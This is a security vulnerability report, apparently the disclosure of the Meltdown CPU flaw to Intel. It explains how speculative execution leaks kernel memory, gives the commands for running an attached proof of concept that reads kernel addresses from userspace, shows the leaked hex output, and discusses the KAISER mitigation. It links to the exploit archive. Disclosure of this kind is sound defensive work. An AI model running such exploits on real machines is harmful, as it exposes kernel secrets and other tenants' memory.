146 lines
No EOL
5.7 KiB
Text
146 lines
No EOL
5.7 KiB
Text
== INTRODUCTION ==
|
|
This is a bug report about a CPU security issue that affects
|
|
processors by Intel, AMD and (to some extent) ARM.
|
|
|
|
I have written a PoC for this issue that, when executed in userspace
|
|
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
|
|
can leak around 2000 bytes per second from Linux kernel memory after a
|
|
~4-second startup, in a 4GiB address space window, with the ability to
|
|
read from random offsets in that window. The same thing also works on
|
|
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
|
|
|
|
On the Intel CPU, I also have preliminary results that suggest that it
|
|
may be possible to leak host memory (which would include memory owned
|
|
by other guests) from inside a KVM guest.
|
|
|
|
The attack doesn't seem to work as well on ARM - perhaps because ARM
|
|
CPUs don't perform as much speculative execution because of a
|
|
different performance-energy-tradeoff or so?
|
|
|
|
All PoCs are written against specific processors and will likely
|
|
require at least some adjustments before they can run in other
|
|
environments, e.g. because of hardcoded timing tresholds.
|
|
|
|
############################################################
|
|
|
|
On the following Intel CPUs (the only ones tested so far), we managed
|
|
to leak information using another variant of this issue ("variant 3").
|
|
So far, we have not managed to leak information this way on AMD or ARM CPUs.
|
|
|
|
- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
|
|
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
|
|
|
|
Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
|
|
speculative execution have something like the following behavior:
|
|
|
|
- If the address is not mapped (perhaps also under other
|
|
conditions?), instructions that depend on the load are not executed.
|
|
- If the address is mapped, but not sufficiently cached, the load loads zeroes.
|
|
Instructions that depend on the load are executed.
|
|
Perhaps Intel decided that in case of a sufficiently high-latency load,
|
|
it makes sense to speculate ahead with a dummy value to get a chance to
|
|
prefetch cachelines for dependent loads, or something like that?
|
|
- If the address is sufficiently cached, the load loads the data stored at the
|
|
given address, without respecting the privilege level.
|
|
Instructions that depend on the load are executed.
|
|
This is the vulnerable case.
|
|
|
|
|
|
I have attached a PoC that works on both tested Intel systems, named
|
|
intel_kernel_read_poc.tar. Usage:
|
|
|
|
As root, determine where the core_pattern is in the kernel:
|
|
|
|
=====
|
|
# grep core_pattern /proc/kallsyms
|
|
ffffffff81e8aea0 D core_pattern
|
|
=====
|
|
|
|
Then, as a normal user, unpack the PoC and use it to leak the
|
|
core_pattern (and potentially other cached things around it) from
|
|
kernel memory, using the pointer from the previous step:
|
|
|
|
=====
|
|
$ cat /proc/sys/kernel/core_pattern
|
|
/cores/%E.%p.%s.%t
|
|
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
|
|
ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
|
|
|/cores/%E.%p.%s.|
|
|
ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
|
|
|%t.apport %p %s |
|
|
ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c
|
|
%P...........|
|
|
[ zeroes ]
|
|
ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
|
|
|................|
|
|
ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff |
|
|
.......u.......|
|
|
[ zeroes ]
|
|
ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
|
|
|e[..............|
|
|
ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
|
|
|....mA..........|
|
|
[ zeroes ]
|
|
|
|
real 0m13.726s
|
|
user 0m9.820s
|
|
sys 0m3.908s
|
|
=====
|
|
|
|
As you can see, the core_pattern, part of the previous core_pattern (behind the
|
|
first nullbyte) and a few kernel pointers were leaked.
|
|
|
|
To confirm whether other leaked kernel data was leaked correctly, use gdb as
|
|
root to read kernel memory:
|
|
|
|
=====
|
|
# gdb /bin/sleep /proc/kcore
|
|
[...]
|
|
(gdb) x/4gx 0xffffffff81e8af20
|
|
0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
|
|
0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
|
|
(gdb) x/4gx 0xffffffff81e8bb60
|
|
0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
|
|
0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
|
|
=====
|
|
|
|
Note that the PoC will report uncached bytes as zeroes.
|
|
|
|
|
|
To Intel:
|
|
Please tell me if you have trouble reproducing this issue.
|
|
Given how different my two test machines are, I would be surprised if this
|
|
didn't just work out of the box on other CPUs from the same generation.
|
|
This PoC doesn't have hardcoded timings or anything like that.
|
|
|
|
We have not yet tested whether this still works after a TLB flush.
|
|
|
|
|
|
Regarding possible mitigations:
|
|
|
|
A short while ago, Daniel Gruss presented KAISER:
|
|
https://gruss.cc/files/kaiser.pdf
|
|
https://lkml.org/lkml/2017/5/4/220 (cached:
|
|
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
|
|
)
|
|
https://github.com/IAIK/KAISER
|
|
|
|
Basically, the issue that KAISER tries to mitigate is that on Intel
|
|
CPUs, the timing of a pagefault reveals whether the address is
|
|
unmapped or mapped as kernel-only (because for an unmapped address, a
|
|
pagetable walk has to occur while for a mapped address, the TLB can be
|
|
used). KAISER duplicates the top-level pagetables of all processes and
|
|
switches them on kernel entry and exit. The kernel's top-level
|
|
pagetable looks as before. In the top-level pagetable used while
|
|
executing userspace code, most entries that are only used by the
|
|
kernel are zeroed out, except for the kernel text and stack that are
|
|
necessary to execute the syscall/exception entry code that has to
|
|
switch back the pagetable.
|
|
|
|
I suspect that this approach might also be usable for mitigating
|
|
variant 3, but I don't know how much TLB flushing / data cache
|
|
flushing would be necessary to make it work.
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip |